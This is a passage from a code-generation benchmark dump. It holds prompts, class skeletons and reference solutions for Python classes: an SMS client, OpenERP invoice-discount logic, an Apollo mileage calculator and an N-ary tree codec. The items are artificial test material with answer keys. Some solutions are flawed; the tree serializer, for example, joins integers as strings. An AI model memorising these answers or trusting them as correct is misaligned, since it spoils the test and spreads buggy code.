<|body_2|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_0|>\n\n<|body_start_1|>\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_1|>\n\n<|body_start_2|>\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body 
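Note that sms_config_set serializes twice: the cfg dict is dumped to a JSON string first, and that string is then embedded as the 'config' value of the outer body, which is dumped again. A self-contained sketch of what actually goes over the wire; the section and option names are made up for illustration.

import json

cfg = {"sms": {"gateway": "10.0.0.1", "retries": "3"}}  # {section: {option: value}}
kwargs = {"log": {"level": "info"}}                     # extra sections merged in

cfg.update(kwargs)
inner = json.dumps(cfg)                    # first pass: config dict -> JSON string
post_body = json.dumps({"config": inner})  # second pass: wrap that string

print(post_body)  # {"config": "{\"sms\": {\"gateway\": \"10.0.0.1\", ...}"}
round_tripped = json.loads(json.loads(post_body)["config"])
assert round_tripped == cfg  # the server must json.loads twice to recover cfg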
= json.loads(body)\n return service_client.ResponseBody(resp, body)\n<|end_body_2|>\n", "revision_id": "1ccdab06d5800572ee0fc569c87d56332efe1538", "skeleton": "<|skeleton|>\nclass SfNotifySmsClient:\n\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n <|body_0|>\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n <|body_1|>\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n <|body_2|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SfNotifySmsClient:\n def sms_create(self, phone, message):\n \"\"\"create sms :param phone(required): The phone number to send :param message(required): Content of short message\"\"\"\n uri = '%s/sms/send' % self.uri_prefix\n post_body = {'phone': phone, 'sms': message}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n\n def sms_config_set(self, cfg, **kwargs):\n \"\"\"update config ini file :param cfg: dict of config like this: {section:{option:value}} :param kwargs: multiple section\"\"\"\n uri = '%s/sms/config' % self.uri_prefix\n if kwargs:\n cfg.update(kwargs)\n cfg = json.dumps(cfg)\n post_body = {'config': cfg}\n post_body = json.dumps(post_body)\n resp, body = self.post(uri, post_body)\n self.expected_success(201, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n\n def sms_config_get(self):\n \"\"\"get config ini file\"\"\"\n uri = '%s/sms/config' % self.uri_prefix\n resp, body = self.get(uri)\n self.expected_success(200, resp.status)\n body = json.loads(body)\n return service_client.ResponseBody(resp, body)\n", "source": "the_stack_v2_python_sparse", "source_path": "yibo/tempest/tempest/services/sf_notify/json/sf_notify_sms_client.py", "source_repo": "laoyigrace/files", "split": "test", "star_events_count": 0} {"blob_id": "3d24fd6755f714a54ea8a3c0add0fed752b9608c", "bodies": ["discount = 0.0\nif move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\nelif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\nreturn discount", "discount = 0.0\nif move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\nelif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\nreturn discount", "price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\nif move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\nelif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\nreturn price_unit", "result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\nresult['discount'] = self._get_discount_invoice(cr, uid, move_line)\nresult['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\nresult['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\nreturn result"], "bodies_text": "<|body_start_0|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = 
move_line.sale_line_id.discount\n return discount\n<|end_body_0|>\n\n<|body_start_1|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n<|end_body_1|>\n\n<|body_start_2|>\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n<|end_body_2|>\n\n<|body_start_3|>\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n<|end_body_3|>\n", "class_docstring": "", "class_name": "stock_picking", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass stock_picking:\n\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_0|>\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_1|>\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n <|body_2|>\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\n return discount\n<|end_body_0|>\n\n<|body_start_1|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n<|end_body_1|>\n\n<|body_start_2|>\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n<|end_body_2|>\n\n<|body_start_3|>\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n<|end_body_3|>\n", "id": "stack_v2_sparse_classes_10k_test_000042", "length_bytes": 3397, "license_type": "no_license", 
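The three lookup helpers in this record share one shape: prefer the purchase line's value when the stock move has one, fall back to the sale line, and default otherwise. A framework-free sketch of that precedence; SimpleNamespace stands in for OpenERP browse records, and a falsy .id means "no linked line".

from types import SimpleNamespace as NS

def get_discount(move_line):
    # purchase line wins over sale line, mirroring _get_discount_invoice
    discount = 0.0
    if move_line.purchase_line_id.id:
        discount = move_line.purchase_line_id.discount
    elif move_line.sale_line_id.id:
        discount = move_line.sale_line_id.discount
    return discount

no_line = NS(id=False, discount=None)
purchase = NS(id=1, discount=10.0)
sale = NS(id=2, discount=5.0)

assert get_discount(NS(purchase_line_id=purchase, sale_line_id=sale)) == 10.0
assert get_discount(NS(purchase_line_id=no_line, sale_line_id=sale)) == 5.0
assert get_discount(NS(purchase_line_id=no_line, sale_line_id=no_line)) == 0.0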
"methods": [{"docstring": "Return the discount for the move line", "name": "_get_discount_invoice", "signature": "def _get_discount_invoice(self, cr, uid, move_line)"}, {"docstring": "Return the discount for the move line", "name": "_get_discount2_invoice", "signature": "def _get_discount2_invoice(self, cr, uid, move_line)"}, {"docstring": "Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line", "name": "_get_price_unit_invoice", "signature": "def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None)"}, {"docstring": "Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line", "name": "_prepare_invoice_line", "signature": "def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)"}], "n_methods": 4, "original_id": "stack_v2_sparse_classes_30k_train_002653", "prompt": "Implement the Python class `stock_picking` described below.\n\nClass description:\nImplement the stock_picking class.\n\nMethod signatures and docstrings:\n- def _get_discount_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_discount2_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None): Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\n- def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None): Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line", "prompted_full_text": "Implement the Python class `stock_picking` described below.\n\nClass description:\nImplement the stock_picking class.\n\nMethod signatures and docstrings:\n- def _get_discount_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_discount2_invoice(self, cr, uid, move_line): Return the discount for the move line\n- def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None): Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\n- def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None): Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\n\n<|skeleton|>\nclass stock_picking:\n\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_0|>\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_1|>\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price 
unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n <|body_2|>\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\n return discount\n<|end_body_0|>\n\n<|body_start_1|>\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n<|end_body_1|>\n\n<|body_start_2|>\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n<|end_body_2|>\n\n<|body_start_3|>\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n<|end_body_3|>\n", "revision_id": "78fc164679b690bcf84866987266838de134bc2f", "skeleton": "<|skeleton|>\nclass stock_picking:\n\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_0|>\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n <|body_1|>\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n <|body_2|>\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n <|body_3|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class stock_picking:\n def _get_discount_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = move_line.purchase_line_id.discount\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount\n return discount\n\n def _get_discount2_invoice(self, cr, uid, move_line):\n \"\"\"Return the discount for the move line\"\"\"\n discount = 0.0\n if move_line.purchase_line_id.id:\n discount = 
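One detail worth noticing in _prepare_invoice_line as dumped: it hard-codes context=None when calling super() and _get_price_unit_invoice, so whatever context the caller passed in is silently dropped. A minimal sketch of why that matters and the usual fix of forwarding the incoming context; the tiny class hierarchy below is illustrative, not the record's actual OpenERP models.

class Base:
    def prepare(self, context=None):
        # pretend the upstream implementation varies with context (e.g. language)
        lang = (context or {}).get("lang", "en_US")
        return {"name": "invoice line", "lang": lang}

class BuggyChild(Base):
    def prepare(self, context=None):
        return super().prepare(context=None)      # drops the caller's context

class FixedChild(Base):
    def prepare(self, context=None):
        return super().prepare(context=context)   # forwards it

ctx = {"lang": "fr_FR"}
assert BuggyChild().prepare(ctx)["lang"] == "en_US"  # context lost
assert FixedChild().prepare(ctx)["lang"] == "fr_FR"  # context preserved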
move_line.purchase_line_id.discount2\n elif move_line.sale_line_id.id:\n discount = move_line.sale_line_id.discount2\n return discount\n\n def _get_price_unit_invoice(self, cr, uid, move_line, type, context=None):\n \"\"\"Gets price unit for invoice @param move_line: Stock move lines @param type: Type of invoice @return: The price unit for the move line\"\"\"\n price_unit = super(stock_picking, self)._get_price_unit_invoice(cr, uid, move_line, type)\n if move_line.purchase_line_id.id:\n price_unit = move_line.purchase_line_id.price_unit\n elif move_line.sale_line_id.id:\n price_unit = move_line.sale_line_id.price_unit\n return price_unit\n\n def _prepare_invoice_line(self, cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None):\n \"\"\"Builds the dict containing the values for the invoice line @param group: True or False @param picking: picking object @param: move_line: move_line object @param: invoice_id: ID of the related invoice @param: invoice_vals: dict used to created the invoice @return: dict that will be used to create the invoice line\"\"\"\n result = super(stock_picking, self)._prepare_invoice_line(cr, uid, group, picking, move_line, invoice_id, invoice_vals, context=None)\n result['discount'] = self._get_discount_invoice(cr, uid, move_line)\n result['discount2'] = self._get_discount2_invoice(cr, uid, move_line)\n result['price_unit'] = self._get_price_unit_invoice(cr, uid, move_line, invoice_vals['type'], context=None)\n return result\n", "source": "the_stack_v2_python_sparse", "source_path": "openforce_pricelist_discount_line/stock/stock_picking.py", "source_repo": "alessandrocamilli/7-openforce-addons", "split": "test", "star_events_count": 1} {"blob_id": "ff046abe78ec256785e4479dcf80a8f70495548a", "bodies": ["self.auto_mileage = 0.0\nself.manual_mileage = 0.0\nself.disengagements = 0", "last_pos = None\nlast_mode = 'Unknown'\nmileage = collections.defaultdict(lambda: 0.0)\nchassis = chassis_pb2.Chassis()\nlocalization = localization_pb2.LocalizationEstimate()\nreader = RecordReader(bag_file)\nfor msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\nself.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\nself.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]"], "bodies_text": "<|body_start_0|>\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n<|end_body_0|>\n\n<|body_start_1|>\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == 
kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n<|end_body_1|>\n", "class_docstring": "Calculate mileage", "class_name": "MileageCalculator", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n <|body_0|>\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n<|end_body_0|>\n\n<|body_start_1|>\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000043", "length_bytes": 3604, "license_type": "permissive", "methods": [{"docstring": "Init.", "name": "__init__", "signature": "def __init__(self)"}, {"docstring": "Calculate mileage", "name": "calculate", "signature": "def calculate(self, bag_file)"}], "n_methods": 2, "prompt": "Implement the Python class `MileageCalculator` described below.\n\nClass description:\nCalculate mileage\n\nMethod signatures and docstrings:\n- def __init__(self): Init.\n- def calculate(self, bag_file): Calculate mileage", "prompted_full_text": "Implement the Python class `MileageCalculator` described below.\n\nClass description:\nCalculate mileage\n\nMethod signatures and docstrings:\n- def __init__(self): Init.\n- def calculate(self, bag_file): Calculate mileage\n\n<|skeleton|>\nclass MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n <|body_0|>\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n<|end_body_0|>\n\n<|body_start_1|>\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if 
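The mileage increment in calculate is a straight-line 3D distance in meters converted to miles via the 0.000621371 factor, accumulated per driving mode; last_pos is reset to None on every mode change so no distance is counted across a transition. The formula in isolation:

import math

METERS_TO_MILES = 0.000621371

def segment_miles(p, q):
    """Euclidean distance between two (x, y, z) positions in meters, in miles."""
    return METERS_TO_MILES * math.sqrt(
        (q[0] - p[0]) ** 2 + (q[1] - p[1]) ** 2 + (q[2] - p[2]) ** 2)

# 1609.344 m is one mile; the record's constant is the usual rounded
# reciprocal, so the result is ~0.99999 rather than exactly 1.0.
print(segment_miles((0, 0, 0), (1609.344, 0, 0)))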
last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n<|end_body_1|>\n", "revision_id": "105f7fd19220dc4c04be1e075b1a5d932eaa2f3f", "skeleton": "<|skeleton|>\nclass MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n <|body_0|>\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class MileageCalculator:\n \"\"\"Calculate mileage\"\"\"\n\n def __init__(self):\n \"\"\"Init.\"\"\"\n self.auto_mileage = 0.0\n self.manual_mileage = 0.0\n self.disengagements = 0\n\n def calculate(self, bag_file):\n \"\"\"Calculate mileage\"\"\"\n last_pos = None\n last_mode = 'Unknown'\n mileage = collections.defaultdict(lambda: 0.0)\n chassis = chassis_pb2.Chassis()\n localization = localization_pb2.LocalizationEstimate()\n reader = RecordReader(bag_file)\n for msg in reader.read_messages():\n if msg.topic == kChassisTopic:\n chassis.ParseFromString(msg.message)\n if last_mode != chassis.driving_mode:\n if last_mode == Chassis.COMPLETE_AUTO_DRIVE and chassis.driving_mode == Chassis.EMERGENCY_MODE:\n self.disengagements += 1\n last_mode = chassis.driving_mode\n last_pos = None\n elif msg.topic == kLocalizationTopic:\n localization.ParseFromString(msg.message)\n cur_pos = localization.pose.position\n if last_pos:\n mileage[last_mode] += 0.000621371 * math.sqrt((cur_pos.x - last_pos.x) ** 2 + (cur_pos.y - last_pos.y) ** 2 + (cur_pos.z - last_pos.z) ** 2)\n last_pos = cur_pos\n self.auto_mileage += mileage[Chassis.COMPLETE_AUTO_DRIVE]\n self.manual_mileage += mileage[Chassis.COMPLETE_MANUAL] + mileage[Chassis.EMERGENCY_MODE]\n", "source": "the_stack_v2_python_sparse", "source_path": "modules/tools/rosbag/stat_mileage.py", "source_repo": "lgsvl/apollo-5.0", "split": "test", "star_events_count": 86} {"blob_id": "162fd1e0c6bcf44241d4c11f077c73c1d1b1a905", "bodies": ["if root is None:\n return ''\ndata = []\ndeq = collections.deque([root])\nwhile deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\nreturn ','.join(data)", "if len(data) == 0:\n return None\ndata = data.split(',')\nroot = Node(int(data[0]), [])\nn = int(data[1])\ndeq = collections.deque([(root, n)])\ni = 2\nwhile deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\nreturn root"], "bodies_text": "<|body_start_0|>\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return 
','.join(data)\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Codec", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. :type data: str :rtype: Node\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n if root is None:\n return ''\n data = []\n deq = collections.deque([root])\n while deq:\n node = deq.popleft()\n data.append(node.val)\n data.append(str(0 if not node.children else len(node.children)))\n if node.children:\n for child in node.children:\n deq.append(child)\n return ','.join(data)\n<|end_body_0|>\n\n<|body_start_1|>\n if len(data) == 0:\n return None\n data = data.split(',')\n root = Node(int(data[0]), [])\n n = int(data[1])\n deq = collections.deque([(root, n)])\n i = 2\n while deq:\n node, n = deq.popleft()\n for j in range(i, i + 2 * n, 2):\n child = Node(int(data[j]), [])\n k = int(data[j + 1])\n node.children.append(child)\n deq.append((child, k))\n i += 2 * n\n return root\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000044", "length_bytes": 3144, "license_type": "no_license", "methods": [{"docstring": "Encodes a tree to a single string. :type root: Node :rtype: str", "name": "serialize", "signature": "def serialize(self, root: 'Node') -> str"}, {"docstring": "Decodes your encoded data to tree. :type data: str :rtype: Node", "name": "deserialize", "signature": "def deserialize(self, data: str) -> 'Node'"}], "n_methods": 2, "prompt": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node", "prompted_full_text": "Implement the Python class `Codec` described below.\n\nClass description:\nImplement the Codec class.\n\nMethod signatures and docstrings:\n- def serialize(self, root: 'Node') -> str: Encodes a tree to a single string. :type root: Node :rtype: str\n- def deserialize(self, data: str) -> 'Node': Decodes your encoded data to tree. :type data: str :rtype: Node\n\n<|skeleton|>\nclass Codec:\n\n def serialize(self, root: 'Node') -> str:\n \"\"\"Encodes a tree to a single string. :type root: Node :rtype: str\"\"\"\n <|body_0|>\n\n def deserialize(self, data: str) -> 'Node':\n \"\"\"Decodes your encoded data to tree. 
